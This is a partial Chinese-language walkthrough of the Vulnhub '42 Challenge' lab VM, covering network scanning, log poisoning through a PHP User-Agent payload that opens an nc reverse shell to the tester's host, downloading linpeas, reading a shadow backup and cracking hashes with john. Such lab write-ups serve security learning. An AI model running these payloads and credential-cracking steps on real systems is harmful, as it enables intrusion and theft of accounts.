Vulnhub之42 Challenge靶机详细测试过程(部分)
42 Challenge
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:8c:89:2c 1 60 PCS Systemtechnik GmbH
192.168.56.243 08:00:27:4f:27:cb 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.243
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.243 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-30 09:28 EST
Nmap scan report for bogon (192.168.56.243)
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:8a:b4:a8:28:76:56:ce:49:d6:d5:6c:11:e5:38:dd (RSA)
| 256 8c:f7:82:be:14:11:01:cd:d3:07:3b:87:6b:b7:fd:4c (ECDSA)
|_ 256 45:56:fc:1d:10:a9:62:6f:4f:ae:66:36:aa:86:d2:e9 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Ip Pinger
|_http-server-header: nginx/1.14.0 (Ubuntu)
MAC Address: 08:00:27:4F:27:CB (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.38 seconds
NMAP扫描结果表明目标主机有两个开放端口:22(SSH)、80(HTTP/NGINX)
获得Shell
返回结果:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false whoopsie:x:112:117::/nonexistent:/bin/false kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin saned:x:114:119::/var/lib/saned:/usr/sbin/nologin pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false marvin:x:1000:1000:42 Challenge,,,:/home/marvin:/bin/bash sshd:x:122:65534::/run/sshd:/usr/sbin/nologin mysql:x:123:127:MySQL Server,,,:/nonexistent:/bin/false lucas:x:1001:1001::/home/lucas:/bin/bash maria:x:1002:1002::/home/maria:/bin/bash pedro:x:1003:1003::/home/pedro:/bin/bash laura:x:1004:1004::/home/laura:/bin/bash
除root用户外发现了一下用户:
marvin:x:1000:1000:42 Challenge,,,:/home/marvin:/bin/bash
lucas:x:1001:1001::/home/lucas:/bin/bash
maria:x:1002:1002::/home/maria:/bin/bash
pedro:x:1003:1003::/home/pedro:/bin/bash
laura:x:1004:1004::/home/laura:/bin/bash
有理由相信可以访问/var/log/nginx/access.log,即web服务器nginx的访问日志:
返回:
92.168.56.206 - - [30/Nov/2022:23:34:10 +0100] "POST /index.php
HTTP/1.1" 302 799
"http://192.168.56.243/index.php?log=logs/192.168.56.206.log"
"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
因此通过向access.log文件注入php shell语句,从而拿到shell
通过在user-agent中插入php语句,然后由curl发起请求:
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ curl -A "<?php system('nc -e /bin/bash 192.168.56.206 5555'); ?>" http://192.168.56.243/index.php
然后浏览器访问,并由burpsuite拦截请求,修改log的参数为/var/log/nginx/access.log
在Kali Linux上成功拿到了shell:
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.243] 37042
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@42Challenge:~/html$
提权
将Linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,并执行脚本:
www-data@42Challenge:~/html$ cd /tmp
cd /tmp
www-data@42Challenge:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-11-30 23:45:35-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 747.87K --.-KB/s in 0.007s
2022-11-30 23:45:35 (104 MB/s) - 'linpeas.sh' saved [765823/765823]
www-data@42Challenge:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@42Challenge:/tmp$ ./linpeas.sh
./linpeas.sh
www-data@42Challenge:/var/backups$ cat shadow_backup.bak
cat shadow_backup.bak
root:$6$nGvBJ7Ph$jqHgNPRgfT4/lLkPMXMB0WnD9bmrTXMhjXm2OYmlKTU3G/nn5MVZ93Xi4EwX9TwP.zFwM/CUJ11wxC/whIOdF/:18319:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
avahi-autoipd:*:18295:0:99999:7:::
usbmux:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
rtkit:*:18295:0:99999:7:::
cups-pk-helper:*:18295:0:99999:7:::
speech-dispatcher:!:18295:0:99999:7:::
whoopsie:*:18295:0:99999:7:::
kernoops:*:18295:0:99999:7:::
saned:*:18295:0:99999:7:::
pulse:*:18295:0:99999:7:::
avahi:*:18295:0:99999:7:::
colord:*:18295:0:99999:7:::
hplip:*:18295:0:99999:7:::
geoclue:*:18295:0:99999:7:::
gnome-initial-setup:*:18295:0:99999:7:::
gdm:*:18295:0:99999:7:::
marvin:$6$xVRWEeia$uYlk5.Jgo0A69ykQguBDzY8AeUjvHKwj577rTmn82R6enY9r630TbgRWJmnmoqakgYx0Bg651WOM0cvKdwhaG.:18319:0:99999:7:::
sshd:*:18317:0:99999:7:::
mysql:!:18318:0:99999:7:::
lucas:$6$zBETbEhW$rF/A44Y5NCJATkFfD4Qu4lzebQ/PW5/kPD1WKTzf6/uSt4PtPXESIENWW5xd9PsKGu7k2hCLI9uz7s8HyNHdv.:18318:0:99999:7:::
maria:$6$jD/TgaEw$6HAWM6i4NUsMtSUkqx1d60cdQTLJTWIN/9Y5Qmr0pShdkhiZ/M465WwFDUj4HKnuKZuHc53GPNJg01uY/9DPQ0:18318:0:99999:7:::
www-data@42Challenge:/var/backups$
将shadow文件拷贝至Kali Linux本地,利用john工具破解:
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ wget http://192.168.56.243:8000/shadow_backup.bak
--2022-11-30 09:53:18-- http://192.168.56.243:8000/shadow_backup.bak
Connecting to 192.168.56.243:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1670 (1.6K) [application/x-trash]
Saving to: ‘shadow_backup.bak’
shadow_backup.bak 100%[=====================================================>] 1.63K --.-KB/s in 0s
2022-11-30 09:53:18 (535 MB/s) - ‘shadow_backup.bak’ saved [1670/1670]
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ ls
linpeas.sh nmap_full_scan shadow_backup.bak
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ vim shadow_backup.bak
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow_backup.bak
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
marvinthemartian (marvin)
1g 0:02:54:15 DONE (2022-11-30 12:48) 0.000095g/s 1371p/s 4154c/s 4154C/s naptown410..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
破解出其中一个用户marvin的密码:marvinthemartian,登录SSH:
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ ssh marvin@192.168.56.243
The authenticity of host '192.168.56.243 (192.168.56.243)' can't be established.
ED25519 key fingerprint is SHA256:jSmsE5gghATkcr/R8K7EHpWYAtsBdxMG3VZHrrdWKIk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.243' (ED25519) to the list of known hosts.
marvin@192.168.56.243's password:
:dMMMMMMMMd: oMMMMMMMdyMMMMMMMMM
/mMMMMMMMNh- oMMMh: +MMMMMMMMM
+mMMMMMMMNy- -- .yMMMMMMMMm
.+mMMMMMMMNs- .oNMMMMMMMd/
.omMMMMMMMmo. -sNMMMMMMMh/ .
MMMMMMMMMMMMMMMMMMMMMMMMMMMm oMMMMMMMMN -sN
MMMMMMMMMMMMMMMMMMMMMMMMMMMN oMMMMMMMMN -yNMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMN oMMMMMMMMN -yNMMMM
yyyyyyyyyyyyyyyyyyNMMMMMMMMN oMMMMMMMMN:hNMMMMMM
mMMMMMMMMN -ooooooooo+oooooooo
mMMMMMMMMN
mMMMMMMMMN
mMMMMMMMMN
Welcome to the 42Challenge
Last login: Tue Apr 14 12:43:13 2020 from 192.168.1.91
marvin@42Challenge:~$ id
uid=1000(marvin) gid=1000(marvin) grupos=1000(marvin)
marvin@42Challenge:~$
marvin@42Challenge:~$ find / -perm -4000 -type f 2>/dev/null
/bin/fusermount
/bin/umount
/bin/su
/bin/mount
/bin/ping
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/Lucas_Access
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/arping
/usr/bin/chfn
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/snap/core18/1705/bin/mount
/snap/core18/1705/bin/ping
/snap/core18/1705/bin/su
/snap/core18/1705/bin/umount
/snap/core18/1705/usr/bin/chfn
/snap/core18/1705/usr/bin/chsh
/snap/core18/1705/usr/bin/gpasswd
/snap/core18/1705/usr/bin/newgrp
/snap/core18/1705/usr/bin/passwd
/snap/core18/1705/usr/bin/sudo
/snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1705/usr/lib/openssh/ssh-keysign
/snap/core18/1668/bin/mount
/snap/core18/1668/bin/ping
/snap/core18/1668/bin/su
/snap/core18/1668/bin/umount
/snap/core18/1668/usr/bin/chfn
/snap/core18/1668/usr/bin/chsh
/snap/core18/1668/usr/bin/gpasswd
/snap/core18/1668/usr/bin/newgrp
/snap/core18/1668/usr/bin/passwd
/snap/core18/1668/usr/bin/sudo
/snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1668/usr/lib/openssh/ssh-keysign
/snap/core/8935/bin/mount
/snap/core/8935/bin/ping
/snap/core/8935/bin/ping6
/snap/core/8935/bin/su
/snap/core/8935/bin/umount
/snap/core/8935/usr/bin/chfn
/snap/core/8935/usr/bin/chsh
/snap/core/8935/usr/bin/gpasswd
/snap/core/8935/usr/bin/newgrp
/snap/core/8935/usr/bin/passwd
/snap/core/8935/usr/bin/sudo
/snap/core/8935/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8935/usr/lib/openssh/ssh-keysign
/snap/core/8935/usr/lib/snapd/snap-confine
/snap/core/8935/usr/sbin/pppd
/snap/core/8689/bin/mount
/snap/core/8689/bin/ping
/snap/core/8689/bin/ping6
/snap/core/8689/bin/su
/snap/core/8689/bin/umount
/snap/core/8689/usr/bin/chfn
/snap/core/8689/usr/bin/chsh
/snap/core/8689/usr/bin/gpasswd
/snap/core/8689/usr/bin/newgrp
/snap/core/8689/usr/bin/passwd
/snap/core/8689/usr/bin/sudo
/snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8689/usr/lib/openssh/ssh-keysign
/snap/core/8689/usr/lib/snapd/snap-confine
/snap/core/8689/usr/sbin/pppd
marvin@42Challenge:~$ cat flag.txt
42challenge{marvin_92e8dd9db0b4bd058eaa3ae340c41900}
marvin@42Challenge:~$
发现了/usr/bin/Lucas_Access有SUID位可以利用,将其下载到本地:
marvin@42Challenge:~$ ls
Descargas Documentos Escritorio flag.txt Imágenes Lucas_Access Música Plantillas Público Vídeos
marvin@42Challenge:~$ python -m http.server 9000
/usr/bin/python: No module named http
marvin@42Challenge:~$ python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ wget http://192.168.56.243:9000/Lucas_Access
--2022-11-30 17:58:30-- http://192.168.56.243:9000/Lucas_Access
Connecting to 192.168.56.243:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12864 (13K) [application/octet-stream]
Saving to: ‘Lucas_Access’
Lucas_Access 100%[=====================================================>] 12.56K --.-KB/s in 0s
2022-11-30 17:58:30 (536 MB/s) - ‘Lucas_Access’ saved [12864/12864]
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ ls
linpeas.sh Lucas_Access nmap_full_scan shadow_backup.bak
┌──(kali㉿kali)-[~/Vulnhub/42Challenge]
└─$ sudo gdb ./Lucas_Access
GNU gdb (Debian 12.1-4) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./Lucas_Access...
(No debugging symbols found in ./Lucas_Access)
(gdb) breakpoint *0x0000000000000a80
Undefined command: "breakpoint". Try "help".
(gdb) break *0x0000000000000a80
Breakpoint 1 at 0xa80
(gdb) run
Starting program: /home/kali/Vulnhub/42Challenge/Lucas_Access
zsh:1: permission denied: /home/kali/Vulnhub/42Challenge/Lucas_Access
During startup program exited with code 126.
(gdb) Quit
(gdb) exit
gdb调试玩不转,暂时到这一步吧。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
